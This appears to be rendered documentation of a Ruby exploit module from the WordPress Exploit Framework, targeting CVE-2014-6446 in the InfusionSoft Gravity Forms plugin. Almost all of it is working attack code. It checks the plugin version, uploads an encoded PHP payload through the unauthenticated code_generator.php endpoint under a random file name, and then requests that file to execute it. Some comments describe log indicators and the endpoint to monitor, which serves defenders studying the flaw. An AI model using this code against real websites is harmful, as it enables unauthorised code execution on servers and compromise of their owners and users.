class Wpxf::Exploit::InfusionsoftShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 6
# Registers the module metadata (name, description, credits, references and
# disclosure date) after the superclass constructor has run.
#
# The references identify the issue as CVE-2014-6446 / WPVDB 7634; the
# description gives the affected plugin range as 1.5.3 to 1.5.10.
def initialize
  super

  summary = [
    'This module exploits a file upload vulnerability in versions',
    '1.5.3 to 1.5.10 of the InfusionSoft Gravity Forms plugin which',
    'allows unauthenticated users to upload and execute PHP scripts',
    'in the context of the web server.'
  ].join(' ')

  credits = [
    'g0blin',   # Vulnerability discovery
    'rastating' # WPXF module
  ]

  advisories = [
    ['CVE', '2014-6446'],
    ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
    ['WPVDB', '7634']
  ]

  update_info(
    name: 'InfusionSoft Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Sep 25 2014'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 28
# Delegates the vulnerability check to the framework's readme-based version
# helper for the 'infusionsoft' plugin slug.
#
# NOTE(review): the two version arguments are presumably "fixed in" and
# "introduced in" (that matches the 1.5.3 to 1.5.10 range in the module
# description) -- confirm against the helper's signature. A readme-based
# check only reflects what the readme advertises, so treat the result as an
# indication rather than proof of patch level.
def check
  slug = 'infusionsoft'
  upper_bound = '1.5.11'
  lower_bound = '1.5.3'
  check_plugin_version_from_readme(slug, upper_bound, lower_bound)
end
plugin_url()
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 32
# Builds the URL of the plugin's directory by joining the 'infusionsoft'
# slug onto the target's plugins URL.
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'infusionsoft')
end
run()
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 40
# Runs the module: posts the encoded payload to the plugin's code generator
# script, then requests the file it was written to.
#
# Observable request pattern (useful when reviewing web server logs for
# CVE-2014-6446): a POST to Infusionsoft/utilities/code_generator.php carrying
# the 'fileNamePattern' and 'fileTemplate' fields, answered with HTTP 200 and
# a body containing "Creating File", followed by a GET for a .php file in the
# same utilities directory. The file name is generated per run with a random
# length of 5 to 10 characters, so it is not a stable indicator by itself.
#
# @return [Boolean] false when the superclass run fails, the upload request
#   gets no response or times out, or the upload response is not a 200
#   containing "Creating File"; true once the upload was accepted, whether or
#   not the follow-up GET returned any output.
def run
  return false unless super

  emit_info 'Preparing payload...'
  script_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
  form_fields = {
    'fileNamePattern' => script_name,
    'fileTemplate' => payload.encoded
  }

  emit_info 'Uploading payload...'
  upload_res = execute_post_request(url: uploader_url, body: form_fields)

  # A missing or timed-out response means the upload cannot be confirmed.
  if upload_res.nil? || upload_res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # The script's "Creating File" message is the only success signal checked.
  unless upload_res.code == 200 && upload_res.body =~ /Creating File/i
    emit_info "Response code: #{upload_res.code}", true
    emit_info "Response body: #{upload_res.body}", true
    emit_error 'Failed to upload payload'
    return false
  end

  script_url = normalize_uri(plugin_url, 'Infusionsoft', 'utilities', script_name)
  emit_success "Uploaded the payload to #{script_url}", true

  emit_info 'Executing the payload...'
  exec_res = execute_get_request(url: script_url)
  has_output = exec_res && exec_res.code == 200 && !exec_res.body.strip.empty?
  emit_success "Result: #{exec_res.body}" if has_output

  true
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 36
# Builds the URL of the plugin's code_generator.php script, which lives under
# Infusionsoft/utilities inside the plugin directory. This is the endpoint
# the module posts to, so it is also the path to restrict or monitor on
# installations that cannot be upgraded immediately.
def uploader_url
  script_path = %w[Infusionsoft utilities code_generator.php]
  normalize_uri(plugin_url, *script_path)
end